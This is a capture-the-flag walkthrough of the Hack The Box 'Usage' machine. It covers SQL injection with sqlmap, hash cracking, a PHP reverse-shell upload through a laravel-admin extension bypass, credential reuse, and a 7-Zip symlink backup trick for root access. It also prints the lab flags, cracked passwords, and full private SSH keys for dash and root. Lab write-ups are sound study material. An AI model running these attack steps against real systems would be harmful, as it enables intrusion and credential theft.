HTB - Usage [Easy]
TCP Scan
> TARGET=10.10.11.18 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# UDP scan
> nmap -p- --min-rate=1000 -T4 10.10.11.18 -Pn -sU -vvv -oN nmap_udp_all.nmap
[x]
- Add
10.10.11.18 usage.htb
to/etc/hosts
tcp/80
- There is a url to
admin.usage.htb
- Register an account and login
- cookie is named as
laravel_session
- headers
> curl -I http://usage.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Cache-Control: no-cache, private
Date: Sun, 21 Apr 2024 22:37:22 GMT
Set-Cookie: XSRF-TOKEN=XSRF-TOKEN; expires=Mon, 22 Apr 2024 00:37:22 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=laravel_session; expires=Mon, 22 Apr 2024 00:37:22 GMT; Max-Age=7200; path=/; httponly; samesite=lax
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
- dirsearch
> dirsearch -H "Cookie: XSRF-TOKEN=;laravel_session=cookie" -u http://usage.htb/ -x 503
[18:39:41] 403 - 564B - /%2e%2e;/test
[18:39:58] 403 - 564B - /admpar/.ftppass
[18:40:07] 200 - 6KB - /dashboard
[18:40:18] 403 - 564B - /lib/flex/varien/.actionScriptProperties
[18:40:20] 302 - 334B - /logout/ -> http://usage.htb/login
[18:40:42] 403 - 564B - /twitter/.env
> dirsearch -H "Cookie: laravel_session=cookie" -u http://usage.htb/ -x 503 -m POST
[18:16:16] 403 - 564B - /%2e%2e;/test
[18:16:34] 403 - 564B - /admrev/.ftppass
[18:16:54] 403 - 564B - /lib/flex/varien/.flexLibProperties
[18:17:08] 405 - 568B - /robots.txt
> dirsearch -H "Cookie: cookie" -u http://admin.usage.htb/ -x 503
[18:48:27] 403 - 564B - /%2e%2e;/test
[18:48:49] 403 - 564B - /bitrix/.settings
[18:49:05] 403 - 564B - /lib/flex/varien/.flexLibProperties
[18:49:32] 403 - 564B - /uploads/
[18:49:34] 403 - 564B - /vendor/
- subdomain
> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://usage.htb/" -H "Host: FUZZ.usage.htb" --hh 178
000000024: 200 88 L 226 W 3304 Ch "admin"
- Try
http://usage.htb/forget-password
, found boolean injection
> sqlmap -u http://usage.htb/forget-password -H "Cookie: cookies" --data '_token=<...>&email=test@test.com*' --level 5 --risk 3 --batch --dump --dbms mysql
[19:48:37] [INFO] fetching tables for database: 'usage_blog'
[19:48:37] [INFO] fetching number of tables for database 'usage_blog'
[19:48:37] [INFO] retrieved: 15
[19:48:38] [INFO] retrieved: admin_menu
[19:48:55] [INFO] retrieved: admin_operation_log
[19:49:18] [INFO] retrieved: admin_permissions
[19:49:37] [INFO] retrieved: admin_role_menu
[19:49:55] [INFO] retrieved: admin_role_permissions
[19:50:16] [INFO] retrieved: admin_role_users
[19:50:28] [INFO] retrieved: admin_roles
[19:50:34] [INFO] retrieved: admin_user_permissions
[19:51:01] [INFO] retrieved: admin_users
[19:51:05] [INFO] retrieved: blog
[19:51:11] [INFO] retrieved: failed_jobs
[19:51:26] [INFO] retrieved: migrations
[19:51:39] [INFO] retrieved: password_reset_tokens
[19:52:11] [INFO] retrieved: personal_access_tokens
[19:52:43] [INFO] retrieved: users
> sqlmap -u http://usage.htb/forget-password -H "Cookie: cookies" --data '_token=<...>&email=test@test.com*' --level 5 --risk 3 --batch --dump --dbms mysql -T admin_users
Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name | avatar | password | username | created_at | updated_at | remember_token |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1 | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
- Crack the hash using
john
> john -w=/usr/share/wordlists/rockyou.txt hash
`whatever1`
http://admin.usage.htb/
- Login to
http://admin.usage.htb/
using the above credential - Found the following log entry, but not very useful
$2y$10$E9.N1P92fYSjJGQDfBrUaO05EHW4BxiQITrqjde/WQMKnAQ7k2HJK:admin
- Found
encore/laravel-admin 1.8.18
: https://flyd.uk/post/cve-2023-24249/ - prepare a reverse shell:
/usr/share/webshells/php/php-reverse-shell.php
- rename it to a .jpg and upload, then intercept the traffic and change the extension to .php for the submit action.
- browse to the uploaded file, for this case, it’s:
http://admin.usage.htb/uploads/images/w.php
to trigger the reverse shell
$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
$ cat user.txt
0821865575c6b0dcfe188b2caec7fc8a
- upload linpeas and run
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1269/nginx: worker
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2812 0.0.0.0:* LISTEN 1648/monit
tcp6 0 0 :::22 :::* LISTEN -
/home/dash/snap/lxd/common/config/config.yml
/home/dash/.monit.state
/home/dash/p.sh
/home/dash/.gnupg/crls.d/DIR.txt
/home/dash/.gnupg/pubring.kbx
/home/dash/.gnupg/trustdb.gpg
/home/dash/user.txt
/home/dash/.monit.pid
[+] Searching specific hashes inside files - less false positives (limit 70)
/var/www/html/project_admin/vendor/encore/laravel-admin/tests/seeds/factory.php:$2y$10$U2WSLymU6eKJclK06glaF.Gj3Sw/ieDE3n7mJYjKEgDh4nzUiSESO
/var/www/html/project_admin/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
/var/www/html/usage_blog/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
- forward port 2812, there is a page that required basic auth
> ssh -L 2812:10.10.11.18:2812 -i dash_id_rsa dash@usage.htb
- Found admin password to the forwarded page
dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon 60
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd
#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
if cpu > 80% for 2 cycles then alert
#System Monitoring
check system usage
if memory usage > 80% for 2 cycles then alert
if cpu usage (user) > 70% for 2 cycles then alert
if cpu usage (system) > 30% then alert
if cpu usage (wait) > 20% then alert
if loadavg (1min) > 6 for 2 cycles then alert
if loadavg (5min) > 4 for 2 cycles then alert
if swap usage > 5% then alert
check filesystem rootfs with path /
if space usage > 80% then alert
- there is another user called
xander
, use the same password to access it
> su xander
- check sudo rights
xander@usage:/home/dash$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management
- The binary can be used to backup project files in
/var/www/html
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54874298
Scanning the drive:
3185 folders, 18035 files, 132313316 bytes (127 MiB)
Updating archive: /var/backups/project.zip
Items to compress: 21220
Files read from disk: 18035
Archive size: 72305397 bytes (69 MiB)
Everything is Ok
- so, you can create a symlink to /root to backup the content
# as dash
> ln -s /root /var/www/html/rootfs
- run the back up and then grab the zip file to find the root flag
2f70b84cf7e1d124052bc33950f1ca90
https://www.dotnetperls.com/7-zip-examples -snl : store symbolic links as links
dash_id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
63zj5LQZw2/NvnAAAACmRhc2hAdXNhZ2U=
-----END OPENSSH PRIVATE KEY-----
root_id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
-----END OPENSSH PRIVATE KEY-----
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack